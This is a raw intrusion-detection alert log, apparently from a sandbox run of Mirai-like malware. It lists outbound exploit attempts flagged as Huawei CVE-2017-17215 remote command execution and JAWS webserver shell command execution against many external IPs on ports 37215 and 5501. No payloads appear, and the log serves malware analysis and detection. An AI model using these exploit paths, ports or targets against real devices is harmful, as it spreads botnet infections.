                                              2024-12-13T01:14:16.659855+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.235498241.16.149.4637215TCP
                                              2024-12-13T01:14:16.659855+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2343116190.117.85.25237215TCP
                                              2024-12-13T01:14:16.659855+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2349724102.219.232.10337215TCP
                                              2024-12-13T01:14:16.659855+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2335404156.10.136.22837215TCP
                                              2024-12-13T01:14:16.659855+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.235505298.16.95.315501TCP
                                              2024-12-13T01:14:16.659855+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.235505298.16.95.315501TCP
                                              2024-12-13T01:14:16.659855+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2352188177.111.173.1815501TCP
                                              2024-12-13T01:14:16.659855+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2352188177.111.173.1815501TCP
                                              2024-12-13T01:14:16.659855+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2343884194.159.255.1005501TCP
                                              2024-12-13T01:14:16.659855+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2343884194.159.255.1005501TCP
                                              2024-12-13T01:14:16.659855+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2359768164.240.143.475501TCP
                                              2024-12-13T01:14:16.659855+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2359768164.240.143.475501TCP
                                              2024-12-13T01:14:16.659855+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2342096105.104.128.6737215TCP
                                              2024-12-13T01:14:16.659855+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2341352156.80.85.825501TCP
                                              2024-12-13T01:14:16.659855+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2341352156.80.85.825501TCP
                                              2024-12-13T01:14:16.659855+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2333764198.135.25.345501TCP
                                              2024-12-13T01:14:16.659855+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2333764198.135.25.345501TCP
                                              2024-12-13T01:14:16.659855+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2355344156.244.177.11037215TCP
                                              2024-12-13T01:14:16.659855+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.235657448.146.54.2115501TCP
                                              2024-12-13T01:14:16.659855+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.235657448.146.54.2115501TCP
                                              2024-12-13T01:14:16.659855+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2338796102.23.112.3337215TCP
                                              2024-12-13T01:14:16.659855+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.235762099.20.89.2225501TCP
                                              2024-12-13T01:14:16.659855+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.235762099.20.89.2225501TCP
                                              2024-12-13T01:14:16.659855+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.234179471.147.102.1715501TCP
                                              2024-12-13T01:14:16.659855+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.234179471.147.102.1715501TCP
                                              2024-12-13T01:14:16.659855+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.234294020.65.77.645501TCP
                                              2024-12-13T01:14:16.659855+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.234294020.65.77.645501TCP
                                              2024-12-13T01:14:16.659855+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2338910181.162.133.4937215TCP
                                              2024-12-13T01:14:16.659855+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2344842105.36.238.1837215TCP
                                              2024-12-13T01:14:16.659855+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2337604157.250.114.20137215TCP
                                              2024-12-13T01:14:16.659855+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2354724197.72.128.20137215TCP
                                              2024-12-13T01:14:16.659855+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2348896135.187.132.2175501TCP
                                              2024-12-13T01:14:16.659855+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2348896135.187.132.2175501TCP
                                              2024-12-13T01:14:16.659855+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2358028188.74.203.1585501TCP
                                              2024-12-13T01:14:16.659855+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2358028188.74.203.1585501TCP
                                              2024-12-13T01:14:16.659855+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2336558105.179.203.2737215TCP
                                              2024-12-13T01:14:16.659855+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2332848186.39.116.2037215TCP
                                              2024-12-13T01:14:16.659855+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2337708157.60.40.22237215TCP
                                              2024-12-13T01:14:16.659855+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2351078186.111.217.9837215TCP
                                              2024-12-13T01:14:16.659855+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2356474153.17.105.475501TCP
                                              2024-12-13T01:14:16.659855+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2339774197.144.123.21837215TCP
                                              2024-12-13T01:14:16.659855+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2356474153.17.105.475501TCP
                                              2024-12-13T01:14:16.659855+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2334052186.37.114.7337215TCP
                                              2024-12-13T01:14:16.659855+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2353392197.214.162.13937215TCP
                                              2024-12-13T01:14:16.659855+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.234031689.91.166.1075501TCP
                                              2024-12-13T01:14:16.659855+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.234031689.91.166.1075501TCP
                                              2024-12-13T01:14:16.659855+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2346076160.26.174.16337215TCP
                                              2024-12-13T01:14:16.659855+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.233784636.84.141.2325501TCP
                                              2024-12-13T01:14:16.659855+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.233784636.84.141.2325501TCP
                                              2024-12-13T01:14:16.659855+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2333492102.199.93.2005501TCP
                                              2024-12-13T01:14:16.659855+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2334146201.165.11.2005501TCP
                                              2024-12-13T01:14:16.659855+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2333492102.199.93.2005501TCP
                                              2024-12-13T01:14:16.659855+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2334146201.165.11.2005501TCP
                                              2024-12-13T01:14:16.659855+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2356774180.197.187.95501TCP
                                              2024-12-13T01:14:16.659855+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2356774180.197.187.95501TCP
                                              2024-12-13T01:14:16.659855+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2349672156.61.159.037215TCP
                                              2024-12-13T01:14:16.659855+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2359666186.219.55.237215TCP
                                              2024-12-13T01:14:16.659855+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2353272160.232.33.15137215TCP
                                              2024-12-13T01:14:16.659855+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2339774105.189.245.6437215TCP
                                              2024-12-13T01:14:16.659855+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2345880132.155.22.265501TCP
                                              2024-12-13T01:14:16.659855+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2345880132.155.22.265501TCP
                                              2024-12-13T01:14:16.659855+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2350310160.166.25.9637215TCP
                                              2024-12-13T01:14:16.659855+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.233869236.15.21.945501TCP
                                              2024-12-13T01:14:16.659855+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.233869236.15.21.945501TCP
                                              2024-12-13T01:14:16.659855+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2339266222.248.112.1535501TCP
                                              2024-12-13T01:14:16.659855+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2339266222.248.112.1535501TCP
                                              2024-12-13T01:14:16.659855+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.234766247.118.249.595501TCP
                                              2024-12-13T01:14:16.659855+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.234766247.118.249.595501TCP
                                              2024-12-13T01:14:16.659855+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.235476474.255.87.635501TCP
                                              2024-12-13T01:14:16.659855+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.235476474.255.87.635501TCP
                                              2024-12-13T01:14:16.659855+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.235875086.218.24.385501TCP
                                              2024-12-13T01:14:16.659855+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.235875086.218.24.385501TCP
                                              2024-12-13T01:14:16.659855+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2339736190.222.252.4337215TCP
                                              2024-12-13T01:14:16.659855+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.234713846.73.253.845501TCP
                                              2024-12-13T01:14:16.659855+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.234713846.73.253.845501TCP
                                              2024-12-13T01:14:16.659855+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.234504068.229.49.2045501TCP
                                              2024-12-13T01:14:16.659855+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.234504068.229.49.2045501TCP
                                              2024-12-13T01:14:16.659855+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2343148102.113.6.23637215TCP
                                              2024-12-13T01:14:16.659855+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2344278160.67.4.885501TCP
                                              2024-12-13T01:14:16.659855+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2344278160.67.4.885501TCP
                                              2024-12-13T01:14:16.659855+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2360128186.200.205.20337215TCP
                                              2024-12-13T01:14:16.659855+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2340310105.189.71.237215TCP
                                              2024-12-13T01:14:16.659855+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2335664137.0.176.1225501TCP
                                              2024-12-13T01:14:16.659855+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2335664137.0.176.1225501TCP
                                              2024-12-13T01:14:16.659855+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2341870209.64.110.1825501TCP
                                              2024-12-13T01:14:16.659855+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2341870209.64.110.1825501TCP
                                              2024-12-13T01:14:16.659855+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2339036194.223.156.1895501TCP
                                              2024-12-13T01:14:16.659855+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2339036194.223.156.1895501TCP
                                              2024-12-13T01:14:16.659855+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2344482160.23.71.637215TCP
                                              2024-12-13T01:14:16.659855+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2342142197.5.69.15037215TCP
                                              2024-12-13T01:14:16.659855+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2345664186.80.154.20237215TCP
                                              2024-12-13T01:14:16.659855+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2337786211.222.211.905501TCP
                                              2024-12-13T01:14:16.659855+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2337786211.222.211.905501TCP
                                              2024-12-13T01:14:16.659855+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2334844105.198.52.15637215TCP
                                              2024-12-13T01:14:16.659855+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2358480156.230.141.10937215TCP
                                              2024-12-13T01:14:16.659855+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2356518197.251.39.6837215TCP
                                              2024-12-13T01:14:16.659855+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.235703087.90.163.1655501TCP
                                              2024-12-13T01:14:16.659855+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.235703087.90.163.1655501TCP
                                              2024-12-13T01:14:16.659855+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2338770157.208.214.23737215TCP
                                              2024-12-13T01:14:16.659855+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2344340102.28.8.1037215TCP
                                              2024-12-13T01:14:16.659855+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2358704112.212.47.1125501TCP
                                              2024-12-13T01:14:16.659855+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2358704112.212.47.1125501TCP
                                              2024-12-13T01:14:16.659855+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2346232197.145.149.18637215TCP
                                              2024-12-13T01:14:16.659855+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2339934105.128.176.837215TCP
                                              2024-12-13T01:14:16.659855+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.235986031.82.185.1095501TCP
                                              2024-12-13T01:14:16.659855+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.235986031.82.185.1095501TCP
                                              2024-12-13T01:14:16.659855+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2335658186.5.198.4837215TCP
                                              2024-12-13T01:14:16.659855+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.235748868.65.161.2035501TCP
                                              2024-12-13T01:14:16.659855+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.235748868.65.161.2035501TCP
                                              2024-12-13T01:14:16.659855+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.234203235.234.140.2325501TCP
                                              2024-12-13T01:14:16.659855+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.234203235.234.140.2325501TCP
                                              2024-12-13T01:14:16.659855+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2345902181.140.115.11937215TCP
                                              2024-12-13T01:14:16.659855+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2339642156.250.87.10737215TCP
                                              2024-12-13T01:14:16.659855+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.235098417.135.118.355501TCP
                                              2024-12-13T01:14:16.659855+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.235098417.135.118.355501TCP
                                              2024-12-13T01:14:16.659855+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2342598197.242.122.5237215TCP
                                              2024-12-13T01:14:16.659855+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2335434156.160.14.22337215TCP
                                              2024-12-13T01:14:16.659855+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2344338185.216.178.375501TCP
                                              2024-12-13T01:14:16.659855+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2344338185.216.178.375501TCP
                                              2024-12-13T01:14:16.659855+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2357454105.75.223.3337215TCP
                                              2024-12-13T01:14:16.659855+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.234045836.174.203.685501TCP
                                              2024-12-13T01:14:16.659855+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.234045836.174.203.685501TCP
                                              2024-12-13T01:14:16.659855+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2341716130.234.141.1565501TCP
                                              2024-12-13T01:14:16.659855+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2341716130.234.141.1565501TCP
                                              2024-12-13T01:14:16.659855+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2348432160.69.197.17237215TCP
                                              2024-12-13T01:14:16.659855+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2360482105.241.109.15137215TCP
                                              2024-12-13T01:14:16.659855+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2339298181.88.242.10237215TCP
                                              2024-12-13T01:14:16.659855+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2358890105.152.215.6737215TCP
                                              2024-12-13T01:14:16.659855+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2341538110.85.85.2085501TCP
                                              2024-12-13T01:14:16.659855+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2341538110.85.85.2085501TCP
                                              2024-12-13T01:14:16.659855+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2338754172.110.51.1515501TCP
                                              2024-12-13T01:14:16.659855+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2338754172.110.51.1515501TCP
                                              2024-12-13T01:14:16.659855+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2335064181.36.111.275501TCP
                                              2024-12-13T01:14:16.659855+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2335064181.36.111.275501TCP
                                              2024-12-13T01:14:16.659855+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2336030148.120.5.2325501TCP
                                              2024-12-13T01:14:16.659855+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2336030148.120.5.2325501TCP
                                              2024-12-13T01:14:16.659855+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.234442484.236.143.1955501TCP
                                              2024-12-13T01:14:16.659855+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.234442484.236.143.1955501TCP
                                              2024-12-13T01:14:16.659855+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2351908197.114.114.3137215TCP
                                              2024-12-13T01:14:16.659855+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2344220156.134.141.24137215TCP
                                              2024-12-13T01:14:16.659855+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2346810181.253.77.20237215TCP
                                              2024-12-13T01:14:16.659855+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.233381232.158.166.1905501TCP
                                              2024-12-13T01:14:16.659855+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.233381232.158.166.1905501TCP
                                              2024-12-13T01:14:16.659855+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2349098181.54.4.17037215TCP
                                              2024-12-13T01:14:16.659855+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2357804186.222.67.21937215TCP
                                              2024-12-13T01:14:16.659855+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.234246891.19.134.1175501TCP
                                              2024-12-13T01:14:16.659855+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.234246891.19.134.1175501TCP
                                              2024-12-13T01:14:16.659855+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2351874102.239.51.8937215TCP
                                              2024-12-13T01:14:16.659855+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.233920248.136.45.1775501TCP
                                              2024-12-13T01:14:16.659855+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.233920248.136.45.1775501TCP
                                              2024-12-13T01:14:16.659855+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.235432473.105.84.465501TCP
                                              2024-12-13T01:14:16.659855+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.235432473.105.84.465501TCP
                                              2024-12-13T01:14:16.659855+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2356902206.99.180.1545501TCP
                                              2024-12-13T01:14:16.659855+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2356902206.99.180.1545501TCP
                                              2024-12-13T01:14:16.659855+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2359338184.65.226.2515501TCP
                                              2024-12-13T01:14:16.659855+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2359338184.65.226.2515501TCP
                                              2024-12-13T01:14:16.659855+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2339798160.129.13.5937215TCP
                                              2024-12-13T01:14:16.659855+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2355564223.191.48.19737215TCP
                                              2024-12-13T01:14:16.659855+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2336232105.3.200.7237215TCP
                                              2024-12-13T01:14:16.659855+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2333782186.197.183.9037215TCP
                                              2024-12-13T01:14:16.659855+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2336786156.128.11.2637215TCP
                                              2024-12-13T01:14:16.659855+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2346866181.33.212.4537215TCP
                                              2024-12-13T01:14:16.659855+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2333040217.22.143.1165501TCP
                                              2024-12-13T01:14:16.659855+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2333040217.22.143.1165501TCP
                                              2024-12-13T01:14:16.659855+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.235568439.78.82.2295501TCP
                                              2024-12-13T01:14:16.659855+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.235568439.78.82.2295501TCP
                                              2024-12-13T01:14:16.659855+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2344350186.214.134.13337215TCP
                                              2024-12-13T01:14:16.659855+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2343998181.234.8.4737215TCP
                                              2024-12-13T01:14:16.659855+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.235792691.36.187.355501TCP
                                              2024-12-13T01:14:16.659855+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.235792691.36.187.355501TCP
                                              2024-12-13T01:14:16.659855+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2357518157.65.216.10437215TCP
                                              2024-12-13T01:14:16.659855+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.233302873.40.14.1505501TCP
                                              2024-12-13T01:14:16.659855+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.233302873.40.14.1505501TCP
                                              2024-12-13T01:14:16.659855+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2358982211.168.242.775501TCP
                                              2024-12-13T01:14:16.659855+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2358982211.168.242.775501TCP
                                              2024-12-13T01:14:16.659855+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.235947072.39.55.2035501TCP
                                              2024-12-13T01:14:16.659855+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.235947072.39.55.2035501TCP
                                              2024-12-13T01:14:16.659855+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2355302173.113.131.2375501TCP
                                              2024-12-13T01:14:16.659855+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2355302173.113.131.2375501TCP
                                              2024-12-13T01:14:16.659855+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2356206102.178.106.4037215TCP
                                              2024-12-13T01:14:16.659855+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2346628206.132.8.435501TCP
                                              2024-12-13T01:14:16.659855+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2346628206.132.8.435501TCP
                                              2024-12-13T01:14:16.659855+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2342596102.83.51.22937215TCP
                                              2024-12-13T01:14:16.659855+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2344540108.110.136.2205501TCP
                                              2024-12-13T01:14:16.659855+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2344540108.110.136.2205501TCP
                                              2024-12-13T01:14:16.659855+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2355562190.1.123.22837215TCP
                                              2024-12-13T01:14:16.659855+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2360396157.129.150.24737215TCP
                                              2024-12-13T01:14:16.659855+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2354576132.88.128.605501TCP
                                              2024-12-13T01:14:16.659855+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2354576132.88.128.605501TCP
                                              2024-12-13T01:14:16.659855+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.233480841.19.247.11037215TCP
                                              2024-12-13T01:14:16.659855+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2354646156.126.98.13337215TCP
                                              2024-12-13T01:14:16.659855+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2338022186.155.136.15937215TCP
                                              2024-12-13T01:14:16.659855+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2353526186.26.154.12137215TCP
